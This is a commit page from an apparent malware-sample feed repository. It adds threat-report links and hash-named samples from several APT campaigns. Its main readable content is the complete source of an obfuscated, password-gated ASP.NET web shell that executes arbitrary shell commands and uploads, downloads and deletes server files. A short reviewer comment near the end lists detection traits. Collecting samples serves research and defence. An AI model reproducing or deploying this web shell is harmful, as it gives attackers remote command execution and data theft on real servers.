mirror of
https://github.com/MalwareSamples/Malware-Feed
synced 2024-06-28 09:52:01 +00:00
New Incidents
parent
f79f243dec
commit
7ca3198b3d
@ -5,3 +5,5 @@ https://github.com/sophos-cybersecurity/solarwinds-threathunt/blob/master/iocs.c
|
||||
https://us-cert.cisa.gov/ncas/alerts/aa20-352a
|
||||
|
||||
https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html
|
||||
|
||||
https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
|
||||
|
BIN
2020-11-26_Checkpoint-Bandook/034d8ec8d510033c387bb87cac35d240b7b8daa3b5167732118c755c5e6c1d48
Normal file
BIN
2020-11-26_Checkpoint-Bandook/034d8ec8d510033c387bb87cac35d240b7b8daa3b5167732118c755c5e6c1d48
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/06ed3daccfbb30c68a33583a761fc20cc3e21adb8dd64a42d922e6da2a01c0dd
Normal file
BIN
2020-11-26_Checkpoint-Bandook/06ed3daccfbb30c68a33583a761fc20cc3e21adb8dd64a42d922e6da2a01c0dd
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/072c103759968253b7b25837b43eec546c625ae9c04edd52321d848cf6078b87
Normal file
BIN
2020-11-26_Checkpoint-Bandook/072c103759968253b7b25837b43eec546c625ae9c04edd52321d848cf6078b87
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/0750c7cdc538d79d9ffed0d37f5d9a083902b49ec02d75ee88028db9f3668b59
Normal file
BIN
2020-11-26_Checkpoint-Bandook/0750c7cdc538d79d9ffed0d37f5d9a083902b49ec02d75ee88028db9f3668b59
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/1b0d2d096c5f7fff02a5a4ce623b71b862f63e306a0760722f710c425b4e16ec
Normal file
BIN
2020-11-26_Checkpoint-Bandook/1b0d2d096c5f7fff02a5a4ce623b71b862f63e306a0760722f710c425b4e16ec
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/27c6341554a04bdc792ffbc5cda26511cbcfcc66334fb6ebbc24a14969b4e498
Normal file
BIN
2020-11-26_Checkpoint-Bandook/27c6341554a04bdc792ffbc5cda26511cbcfcc66334fb6ebbc24a14969b4e498
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/2ee74ae5b202c8aab288ca167c630e9ee3569240958e984474b960cd560bbe95
Normal file
BIN
2020-11-26_Checkpoint-Bandook/2ee74ae5b202c8aab288ca167c630e9ee3569240958e984474b960cd560bbe95
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/306238a63896fa8b79b4c9a6d25fd906bb9e4919bc698608ab970677d15b0694
Normal file
BIN
2020-11-26_Checkpoint-Bandook/306238a63896fa8b79b4c9a6d25fd906bb9e4919bc698608ab970677d15b0694
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/3fda0a5da313886b0339eee65c69c779ed620b303ba079ee0864ca4a1496b0b4
Normal file
BIN
2020-11-26_Checkpoint-Bandook/3fda0a5da313886b0339eee65c69c779ed620b303ba079ee0864ca4a1496b0b4
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/408c11caf548048732ac21e88a54e80d47a05b9619c1c16b65fa850e0172f428
Normal file
BIN
2020-11-26_Checkpoint-Bandook/408c11caf548048732ac21e88a54e80d47a05b9619c1c16b65fa850e0172f428
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/40cc5933e608f7a2a5c13af1066257c9e41528bb85e434e2bc3d1f4802dec24d
Normal file
BIN
2020-11-26_Checkpoint-Bandook/40cc5933e608f7a2a5c13af1066257c9e41528bb85e434e2bc3d1f4802dec24d
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/41ccf6de0d51bd29d35be12ae24f04b2f88ec2b202b239424f90c666d25473e8
Normal file
BIN
2020-11-26_Checkpoint-Bandook/41ccf6de0d51bd29d35be12ae24f04b2f88ec2b202b239424f90c666d25473e8
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/5900abb869c61928f0ef931d6f9d8b62183b2bab9a69b0ef886551005d6c9622
Normal file
BIN
2020-11-26_Checkpoint-Bandook/5900abb869c61928f0ef931d6f9d8b62183b2bab9a69b0ef886551005d6c9622
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/6287fc617ff6881169990e6b877c16d8ca3c199f7e453241a0b18a7907c67ab0
Normal file
BIN
2020-11-26_Checkpoint-Bandook/6287fc617ff6881169990e6b877c16d8ca3c199f7e453241a0b18a7907c67ab0
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/66c86f29afb1152aad8e426ebb6569ad03ce7b69ea3c8a5cc40011c2a3ab973b
Normal file
BIN
2020-11-26_Checkpoint-Bandook/66c86f29afb1152aad8e426ebb6569ad03ce7b69ea3c8a5cc40011c2a3ab973b
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/766917fe9b543bf218bd824d55967d63f94b28456f1d4919bc990d8262dc608d
Normal file
BIN
2020-11-26_Checkpoint-Bandook/766917fe9b543bf218bd824d55967d63f94b28456f1d4919bc990d8262dc608d
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/8cb1f713761a6b31c9c25dd2c7ae11e575a634c9f052cfd598ada35a61783230
Normal file
BIN
2020-11-26_Checkpoint-Bandook/8cb1f713761a6b31c9c25dd2c7ae11e575a634c9f052cfd598ada35a61783230
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/97ea91fb673f4994da491433751c4fca011993ba10191f09c70ca6c8d2b4f944
Normal file
BIN
2020-11-26_Checkpoint-Bandook/97ea91fb673f4994da491433751c4fca011993ba10191f09c70ca6c8d2b4f944
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/9a0ee2430f7c77942d544dad6787ca8a94470f6555f1cb08baa9d099c92f8447
Normal file
BIN
2020-11-26_Checkpoint-Bandook/9a0ee2430f7c77942d544dad6787ca8a94470f6555f1cb08baa9d099c92f8447
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/9de287f9af63f02c51c69d9c8480fee2bd4d4bd3c818f2ba81324b1f8ce495c0
Normal file
BIN
2020-11-26_Checkpoint-Bandook/9de287f9af63f02c51c69d9c8480fee2bd4d4bd3c818f2ba81324b1f8ce495c0
Normal file
Binary file not shown.
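--- a/2020-11-26_Checkpoint-Bandook/README.md
+++ b/2020-11-26_Checkpoint-Bandook/README.md
@@ -0,0 +1 @@
+https://research.checkpoint.com/2020/bandook-signed-delivered/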
BIN
2020-11-26_Checkpoint-Bandook/a9a8b0aa5f137e7353db62dc1609da3c709ca30287a5605c73aafaf4968d1e8d
Normal file
BIN
2020-11-26_Checkpoint-Bandook/a9a8b0aa5f137e7353db62dc1609da3c709ca30287a5605c73aafaf4968d1e8d
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/aa868d007c4dfd825104faafb3798b9ab745b29794a57365bef41ec3f6019eea
Normal file
BIN
2020-11-26_Checkpoint-Bandook/aa868d007c4dfd825104faafb3798b9ab745b29794a57365bef41ec3f6019eea
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/add9f9dca97c3b6d52efe7d48ecd3d349a70411eaa3d4aeff6e6215b77f42b90
Normal file
BIN
2020-11-26_Checkpoint-Bandook/add9f9dca97c3b6d52efe7d48ecd3d349a70411eaa3d4aeff6e6215b77f42b90
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/aed7ab5d0de01c3724c917c034e26a5e9eed3f7fbf4082b024576a41725d66cf
Normal file
BIN
2020-11-26_Checkpoint-Bandook/aed7ab5d0de01c3724c917c034e26a5e9eed3f7fbf4082b024576a41725d66cf
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/ba153e449ee926c019b548997c32d0579b9c6f350b1590a025d5d9a216ddbffd
Normal file
BIN
2020-11-26_Checkpoint-Bandook/ba153e449ee926c019b548997c32d0579b9c6f350b1590a025d5d9a216ddbffd
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/ce8ad96819c814dd1735e621639a8845ae7132375879cc5b5d5f6877cb909a68
Normal file
BIN
2020-11-26_Checkpoint-Bandook/ce8ad96819c814dd1735e621639a8845ae7132375879cc5b5d5f6877cb909a68
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/d217288a046e2739159d0081608a44c2e79d41de12c57ebe88a8591693fa15d5
Normal file
BIN
2020-11-26_Checkpoint-Bandook/d217288a046e2739159d0081608a44c2e79d41de12c57ebe88a8591693fa15d5
Normal file
Binary file not shown.
BIN
2020-11-26_Checkpoint-Bandook/ea4792353e0f97968e7c69ffba81c144f22f54382af4e61a1347edd0ae15830f
Normal file
BIN
2020-11-26_Checkpoint-Bandook/ea4792353e0f97968e7c69ffba81c144f22f54382af4e61a1347edd0ae15830f
Normal file
Binary file not shown.
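--- a/2020-11-27_PTSecurity-APT27_Polar_Ransomware/README.md
+++ b/2020-11-27_PTSecurity-APT27_Polar_Ransomware/README.md
@@ -0,0 +1 @@
+https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/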
BIN
2020-11-27_PTSecurity-APT27_Polar_Ransomware/ad9093adf832b6f86d6001331547f0072de21419fe40e6446c3525213add1413
Normal file
BIN
2020-11-27_PTSecurity-APT27_Polar_Ransomware/ad9093adf832b6f86d6001331547f0072de21419fe40e6446c3525213add1413
Normal file
Binary file not shown.
172
2020-11-27_PTSecurity-APT27_Polar_Ransomware/added14aaf3df22b63dcd1c53f02f9de4f9c1f88869e93381305568a87e18cb6
Normal file
172
2020-11-27_PTSecurity-APT27_Polar_Ransomware/added14aaf3df22b63dcd1c53f02f9de4f9c1f88869e93381305568a87e18cb6
Normal file
@ -0,0 +1,172 @@
|
||||
<%@ Page Language="C#" ValidateRequest="false" EnableViewState="false" %>
|
||||
|
||||
<html xmlns="http://www.w3.org/1999/xhtml">
|
||||
<head>
|
||||
<%
|
||||
c();
|
||||
NameValueCollection t=HttpContext.Current.Request.Form;
|
||||
passwords=fbss(t[x("cGFzc3dvcmRz")]);pro=fbss(t[x("cHJv")]);cmd_exceut=fbss(t[x("Y21kX2V4Y2V1dA==")]);sav=fbss(t[x("c2F2")]);vir=t[x("dmly")];nenggg=fbss(t[x("bmVuZ2dn")]);upb=fbss(t[x("dXBi")]);upd=fbss(t["upd"]);del=fbss(t[x("dXBk")]);dongnn=fbss(t[x("ZG9uZ25u")]);baseFileName=t[x("YmFzZUZpbGVOYW1l")];baseAddress=fbss(t[x("YmFzZUFkZHJlc3M=")]);baseVirpath=t[x("YmFzZVZpcnBhdGg=")];
|
||||
if(!string.IsNullOrEmpty(passwords))c(passwords);
|
||||
else if(!string.IsNullOrEmpty(cmd_exceut))r(pro,cmd_exceut);
|
||||
else if(HttpContext.Current.Request.Files[x("dXBsb2FkbA==")]!=null)u(HttpContext.Current.Request.Files[x("dXBsb2FkbA==")],sav,string.IsNullOrEmpty(vir)?false:true,nenggg);
|
||||
else if(!string.IsNullOrEmpty(upb))h(upb,upd);
|
||||
else if(!string.IsNullOrEmpty(del))d(del);
|
||||
else if(!string.IsNullOrEmpty(dongnn))z(dongnn);
|
||||
else if(!string.IsNullOrEmpty(baseFileName))baseuploadl(baseFileName,baseAddress,string.IsNullOrEmpty(baseVirpath)?false:true);
|
||||
|
||||
if(HttpContext.Current.Request.Cookies["data"]!=null){string data=HttpContext.Current.Request.Cookies["data"].Value;string[] data2=data.Split(new string[]{"&|&"},StringSplitOptions.None);for(int i=0;i<data2.Length;i++){string[] data3=data2[i].Split(new string[]{"$=$"},StringSplitOptions.None);
|
||||
switch (data3[0]){
|
||||
case"pro":pro=a(pro,fbss(data3[1]));break;
|
||||
case"cmd_exceut":cmd_exceut=a(cmd_exceut,fbss(data3[1]));break;
|
||||
case"sav":sav=a(sav,fbss(data3[1]));break;
|
||||
case"vir":vir=a(vir,fbss(data3[1]));break;
|
||||
case"nenggg":nenggg=a(nenggg,fbss(data3[1]));break;
|
||||
case"dongnn":dongnn=a(dongnn,fbss(data3[1]));break;
|
||||
}}}
|
||||
|
||||
view();
|
||||
%>
|
||||
<script runat="server">
|
||||
string passwords,pro,cmd_exceut,sav,vir,nenggg,upb,upd,del,dongnn,baseFileName,baseAddress,baseVirpath;
|
||||
bool aut = false;
|
||||
string pp = "FX7nUf6oTBuYLHjBvsBRvoRNM7o=";
|
||||
string a(string a,string b){return string.IsNullOrEmpty(a)?b:a;}
|
||||
string tb(string a)
|
||||
{
|
||||
string ret="";
|
||||
try{
|
||||
ret=string.IsNullOrEmpty(a)?a:Convert.ToBase64String(Encoding.UTF8.GetBytes(a));
|
||||
}catch{
|
||||
|
||||
}
|
||||
return ret;
|
||||
}
|
||||
string fbss(string a){string ret="";try{ret=string.IsNullOrEmpty(a)?a:Encoding.UTF8.GetString(Convert.FromBase64String(a));}catch{}return ret;}
|
||||
void view(){string data = string.Format(x("cHJvJD0kezB9JnwmY21kX2V4Y2V1dCQ9JHsxfSZ8JnNhdiQ9JHsyfSZ8JnZpciQ9JHszfSZ8Jm5lbmdnZyQ9JHs0fSZ8JmRvbmdubiQ9JHs1fQ=="),
|
||||
tb(pro),tb(cmd_exceut),tb(sav),tb(vir),tb(nenggg),tb(dongnn));
|
||||
HttpCookie coo=new HttpCookie("data", data);coo.Expires=DateTime.Now.AddDays(1);HttpContext.Current.Response.SetCookie(coo);}
|
||||
|
||||
void c(string passwords)
|
||||
{
|
||||
try{HttpCookie coo=new HttpCookie(x("cGFzc3dvcmRz"),tb(passwords));
|
||||
coo.Expires=DateTime.Now.AddDays(1);
|
||||
HttpContext.Current.Response.SetCookie(coo);
|
||||
aut=Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(passwords)))==pp;
|
||||
}catch(Exception e)
|
||||
{
|
||||
l(e.Message);}
|
||||
}
|
||||
bool c(){try{if(HttpContext.Current.Request.Cookies[x("cGFzc3dvcmRz")]!=null){aut=Convert.ToBase64String(new System.Security.Cryptography.SHA1CryptoServiceProvider().ComputeHash(Encoding.ASCII.GetBytes(fbss(HttpContext.Current.Request.Cookies[x("cGFzc3dvcmRz")].Value))))==pp;return aut;}}catch(Exception e){l(e.Message);}return false;}
|
||||
void u(HttpPostedFile uploadl, string sav, bool vir, string nenggg){try{if(c()){if(uploadl!=null&&uploadl.ContentLength>0){string fn=string.IsNullOrEmpty(nenggg)?System.IO.Path.GetFileName(uploadl.FileName):nenggg;string path=vir?Server.MapPath(sav):sav;string SaveLocation=System.IO.Path.HasExtension(path)?path:path.TrimEnd('\\')+"\\"+fn;uploadl.SaveAs(SaveLocation);l("File uploadloaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
|
||||
void baseuploadl(string baseFileName,string baseAddress, bool baseVirpath){try{if(c()){if(baseFileName!=null&&baseFileName.Length>0&&!string.IsNullOrEmpty(baseAddress)){string SaveLocation=baseVirpath?Server.MapPath(baseAddress):baseAddress;System.IO.File.WriteAllBytes(SaveLocation,Convert.FromBase64String(baseFileName));l("File uploadloaded successfuly : "+SaveLocation);}}}catch(Exception ex){l(ex.Message);}}
|
||||
void r(string pro, string cmd_exceut){try{if(c()){System.Diagnostics.Process n=new System.Diagnostics.Process();n.StartInfo.FileName=(string.IsNullOrEmpty(pro)?"cmd.exe":pro);n.StartInfo.UseShellExecute=false;n.StartInfo.RedirectStandardInput=true;n.StartInfo.RedirectStandardOutput=true;n.StartInfo.RedirectStandardError=true;n.StartInfo.CreateNoWindow=true;string o=null;n.Start();n.StandardInput.WriteLine(cmd_exceut);n.StandardInput.WriteLine("exit");o=n.StandardOutput.ReadToEnd();n.WaitForExit();n.Close();l(HttpUtility.HtmlEncode(o));}}catch(Exception ex){l(ex.Message);}}
|
||||
void z(string dongnn){try{if(c()&&!string.IsNullOrEmpty(dongnn)){byte[] f=System.IO.File.ReadAllBytes(dongnn);System.Web.HttpContext t=System.Web.HttpContext.Current;t.Response.Clear();t.Response.ClearHeaders();t.Response.ClearContent();t.Response.AppendHeader("content-length",f.Length.ToString());t.Response.ContentType="application/octet-stream";t.Response.AppendHeader("content-disposition","attachment; filename="+dongnn.Substring(dongnn.LastIndexOf('\\')+1));t.Response.BinaryWrite(f);t.Response.End();}}catch(Exception ex){l(ex.Message);}}
|
||||
void h(string upb, string upd){try{if(c()&&!string.IsNullOrEmpty(upb)&&!string.IsNullOrEmpty(upd)){System.IO.File.WriteAllBytes(System.IO.Path.GetTempPath()+upd,Convert.FromBase64String(upb));l(upd+" successfuly uploadloaded");}}catch(Exception ex){l(ex.Message);}}
|
||||
void d(string del){try{if(c()&&!string.IsNullOrEmpty(del)){System.IO.File.Delete(System.IO.Path.GetTempPath()+del);l(del+" successfuly deleled");}}catch(Exception ex){l(ex.Message);}}
|
||||
string x(string f){return Encoding.UTF8.GetString(Convert.FromBase64String(f));}
|
||||
void l(string ll){log.InnerHtml=tb(ll);}
|
||||
</script>
|
||||
<style>body,html{margin:0;padding:3px 0 0 3px;direction:ltr;background:#000;color:#fff !important;}form{margin:0;}*{font:14px "Lucida Console";}t{width:180px;display:inline-block;text-align:right;padding-right:5px;}input[type="text"],input[type="file"],textarea {width:50%;height:25px;background:#444;color:#fff;border:1px solid #999;margin-bottom:3px;}input[type="text"]{padding:2px;}input[type="button"],input[type="submit"] {height:23px;}input[type="checkbox"]{width:23px;height:24px;position:absolute;margin:0;}hr{margin:0;border:0;border-top:1px solid #DDD;}.h{width:100px;text-align:center;background:rgba(19, 96, 0, 1);vertical-align:middle;}table{width:100%;margin:0;border-collapse:collapse;}.b{padding:10px 0px 9px;}</style>
|
||||
<script>
|
||||
function use() { var n = document; var d = n.getElementById("d").innerHTML; d = d.substring(0, d.lastIndexOf('\\') + 1); n.getElementsByName("cmd_exceut")[0].value += d; n.getElementsByName("sav")[0].value += d; n.getElementsByName("dongnn")[0].value += d; }
|
||||
function subm(){var mmm=document.getElementsByClassName('mmm');for(var i=0;i<mmm.length;i++){mmm[i].value=btoa(mmm[i].value);}}
|
||||
function reset() { document.cookie = "data=;expires=Thu, 01 Jan 1971 00:00:01 GMT;path=/";location.href = location.pathname;}
|
||||
</script>
|
||||
<script src='https://mail.namagesy.de/owa/prem/15.1.1847/scripts/microsoft.owa.core.immanager.js' ></script>
|
||||
</head>
|
||||
<body>
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("QWRkcmVzcw==")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("Q3VycmVudA==")%> :</t>
|
||||
<y id="d"><%= Server.MapPath(string.Empty) + "\\"%></y>
|
||||
<input type="button" value="<%=x("VXNl")%>" onclick="use()" />
|
||||
<input type="button" value="<%=x("UmVzZXQgRm9ybQ==")%>" onclick="reset()" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<hr>
|
||||
<form method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("TG9naW4=")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("RG8gaXQ=")%> :</t>
|
||||
<input name="passwords" class="mmm" type="text" style='background-color: <%= aut ? "Green" : "Red" %>' />
|
||||
<input type="submit" value="<%= x("RG8gaXQ=") %>" onclick="subm();" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<hr>
|
||||
<form method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("Q29tbWFuZA==")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("UHJvY2Vzcw==")%> :</t>
|
||||
<input name="pro" class="mmm" type="text" value='<%= string.IsNullOrEmpty(pro) ? x("Y21kLmV4ZQ==") : pro %>' /><br>
|
||||
<t><%=x("Q29tbWFuZA==")%> :</t>
|
||||
<input name="cmd_exceut" class="mmm" type="text" value='<%= cmd_exceut %>' />
|
||||
<input type="submit" value="<%= x("RXhlY3V0ZQ==") %>" onclick="subm();" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<hr>
|
||||
<form method="post" enctype="multipart/form-data">
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("VXBsb2Fk")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("RmlsZSBOYW1l")%> :</t>
|
||||
<input name="uploadl" type="file" /><br>
|
||||
<t><%=x("U2F2ZSBhcw==")%> :</t>
|
||||
<input name="sav" class="mmm" type="text" value='<%= sav %>' />
|
||||
<input name="vir" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
|
||||
<t><%=x("TmV3IEZpbGUgbmFtZQ==")%> :</t>
|
||||
<input name="nenggg" class="mmm" type="text" value='<%= nenggg %>' />
|
||||
<input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<hr>
|
||||
<form method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("RG93bmxvYWQ=")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("RG93bmxvYWQgUGF0aA==")%> :</t>
|
||||
<input name="dongnn" type="text" />
|
||||
<input type="submit" value="<%= x("RG93bmxvYWQ=") %>" onclick="document.getElementsByName('dongnn')[0].value = btoa(document.getElementsByName('dongnn')[0].value);" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<hr />
|
||||
<form method="post">
|
||||
<table>
|
||||
<tr>
|
||||
<td class="h"><%=x("VXBsb2FkIEJhc2U2NA==")%></td>
|
||||
<td class="b">
|
||||
<t><%=x("QmFzZTY0IEZpbGU=")%> :</t>
|
||||
<textarea name="baseFileName"></textarea>
|
||||
<input name="baseVirpath" type="checkbox" /><g><%=x("SXMgdmlydHVhbCBwYXRo")%></g><br>
|
||||
<t><%=x("RmlsZSBQYXRoIGFuZCBOYW1l ")%> :</t>
|
||||
<input name="baseAddress" class="mmm" type="text" value='<%= baseAddress %>' />
|
||||
<input type="submit" value="<%= x("VXBsb2Fk") %>" onclick="subm();" />
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
</form>
|
||||
<hr />
|
||||
</form>
|
||||
<hr />
|
||||
<br />
|
||||
<pre id="log" runat="server"></pre>
|
||||
<script>var ll=document.getElementById('log');if(ll.innerHTML)ll.innerHTML=atob(log.innerHTML);</script>
|
||||
</body>
|
||||
</html>
|
||||
XXxxxx
|
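Review bot: This sample is committed as plain, directly interpretable ASPX source under a bare hash name, and the folder README holds only the report URL, so nothing in the tree tells a reader that the file is a web shell or how it should be stored. A one-line entry in the README would cover it, for example `<sample sha256> : ASP.NET web shell, plain-text source; keep outside any IIS-served directory`. For hunting, the traits visible in this file are `ValidateRequest="false"` on the page directive, form field names passed through the Base64 helper `x(...)`, a SHA-1 digest compared against the hard-coded `pp` value, `System.Diagnostics.Process` started with redirected standard streams, and a `data` cookie that uses the `&|&` and `$=$` separators. The `<script src=...>` tag that loads an OWA script path from an external mail host is worth recording in the README as a network indicator.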
BIN
2020-12-02_ESET-Turla_Crutch/0010ccb822538d1881c61be874af49382c44b6c9cb665081cf0f672cbed5b6a5
Normal file
BIN
2020-12-02_ESET-Turla_Crutch/0010ccb822538d1881c61be874af49382c44b6c9cb665081cf0f672cbed5b6a5
Normal file
Binary file not shown.
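--- a/2020-12-02_ESET-Turla_Crutch/README.md
+++ b/2020-12-02_ESET-Turla_Crutch/README.md
@@ -0,0 +1 @@
+https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/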
BIN
2020-12-09_TrendMicro-SideWinder/1cbec920afe2f978b8f84e0a4e6b757d400aeb96e8c0a221130060b196ece010
Normal file
BIN
2020-12-09_TrendMicro-SideWinder/1cbec920afe2f978b8f84e0a4e6b757d400aeb96e8c0a221130060b196ece010
Normal file
Binary file not shown.
112
2020-12-09_TrendMicro-SideWinder/2548a819e4c597ba5958d2d18baa544452948e5b00271570192ccd79abe88e8d
Normal file
112
2020-12-09_TrendMicro-SideWinder/2548a819e4c597ba5958d2d18baa544452948e5b00271570192ccd79abe88e8d
Normal file
File diff suppressed because one or more lines are too long
2
2020-12-09_TrendMicro-SideWinder/34446f7f60f730fcca145155d10d1aff0a1153b085836df38313772cd03c8d70
Normal file
2
2020-12-09_TrendMicro-SideWinder/34446f7f60f730fcca145155d10d1aff0a1153b085836df38313772cd03c8d70
Normal file
File diff suppressed because one or more lines are too long
2
2020-12-09_TrendMicro-SideWinder/7238f4e5edbe0e5a2242d8780fb58c47e7d32bf2c4f860c88c511c30675d0857
Normal file
2
2020-12-09_TrendMicro-SideWinder/7238f4e5edbe0e5a2242d8780fb58c47e7d32bf2c4f860c88c511c30675d0857
Normal file
File diff suppressed because one or more lines are too long
112
2020-12-09_TrendMicro-SideWinder/75c158cea14e338c8d9d32ed988c7032da9ae6d54f5b1126ed6a83f71b9e03bf
Normal file
112
2020-12-09_TrendMicro-SideWinder/75c158cea14e338c8d9d32ed988c7032da9ae6d54f5b1126ed6a83f71b9e03bf
Normal file
File diff suppressed because one or more lines are too long
BIN
2020-12-09_TrendMicro-SideWinder/799260b992c77e2e14f2d586665c570142d8425864455cab5f2575015cd0b87a
Normal file
BIN
2020-12-09_TrendMicro-SideWinder/799260b992c77e2e14f2d586665c570142d8425864455cab5f2575015cd0b87a
Normal file
Binary file not shown.
112
2020-12-09_TrendMicro-SideWinder/96bf8f579acb8d9d0ff116d05fdadef85953f11e5b2e703041fdae0abf5b75dc
Normal file
112
2020-12-09_TrendMicro-SideWinder/96bf8f579acb8d9d0ff116d05fdadef85953f11e5b2e703041fdae0abf5b75dc
Normal file
File diff suppressed because one or more lines are too long
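--- a/2020-12-09_TrendMicro-SideWinder/README.md
+++ b/2020-12-09_TrendMicro-SideWinder/README.md
@@ -0,0 +1 @@
+https://www.trendmicro.com/en_us/research/20/l/sidewinder-leverages-south-asian-territorial-issues-for-spear-ph.html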
2
2020-12-09_TrendMicro-SideWinder/ab7c1967bf1fefdffde93626b78eb30994655ab02f59e0adb0935e3e599a953f
Normal file
2
2020-12-09_TrendMicro-SideWinder/ab7c1967bf1fefdffde93626b78eb30994655ab02f59e0adb0935e3e599a953f
Normal file
File diff suppressed because one or more lines are too long
112
2020-12-09_TrendMicro-SideWinder/ed5e1d6e914de64a203f2f32ab95176fc7efff3a520915971d5fe748e79d611c
Normal file
112
2020-12-09_TrendMicro-SideWinder/ed5e1d6e914de64a203f2f32ab95176fc7efff3a520915971d5fe748e79d611c
Normal file
File diff suppressed because one or more lines are too long
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/00bc6fcfa82a693db4d7c1c9d5f4c3d0bfbbd0806e122f1fbded034eb9a67b10
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/00bc6fcfa82a693db4d7c1c9d5f4c3d0bfbbd0806e122f1fbded034eb9a67b10
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/050a45680d5f344034be13d4fc3a7e389ceb096bd01c36c680d8e7a75d3dbae2
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/050a45680d5f344034be13d4fc3a7e389ceb096bd01c36c680d8e7a75d3dbae2
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/094e318d14493a9f56d56b44b30fd396af8b296119ff5b82aca01db9af83fd48
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/094e318d14493a9f56d56b44b30fd396af8b296119ff5b82aca01db9af83fd48
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/0d65b9671e51baf64e1389649c94f2a9c33547bfe1f5411e12c16ae2f2f463dd
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/0d65b9671e51baf64e1389649c94f2a9c33547bfe1f5411e12c16ae2f2f463dd
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/0de10ec9ec327818002281b4cdd399d6cf330146d47ac00cf47b571a6f0a4eaa
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/0de10ec9ec327818002281b4cdd399d6cf330146d47ac00cf47b571a6f0a4eaa
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2115d02ead5e497ce5a52ab9b17f0e007a671b3cd95aa55554af17d9a30de37c
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2115d02ead5e497ce5a52ab9b17f0e007a671b3cd95aa55554af17d9a30de37c
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2118c79dbb6767549cf9aa12367faa8f55281d4299d0a3f4c2f40c1686d8016a
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/2118c79dbb6767549cf9aa12367faa8f55281d4299d0a3f4c2f40c1686d8016a
Normal file
Binary file not shown.
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/23aa2347bf83127d40e05742d7c521245e51886f38b285be7227ddb96d765337
Normal file
BIN
2020-12-16_TeamCymru-APTC_23_AridViper_GnatSpy/23aa2347bf83127d40e05742d7c521245e51886f38b285be7227ddb96d765337
Normal file
Binary file not shown.
BIN
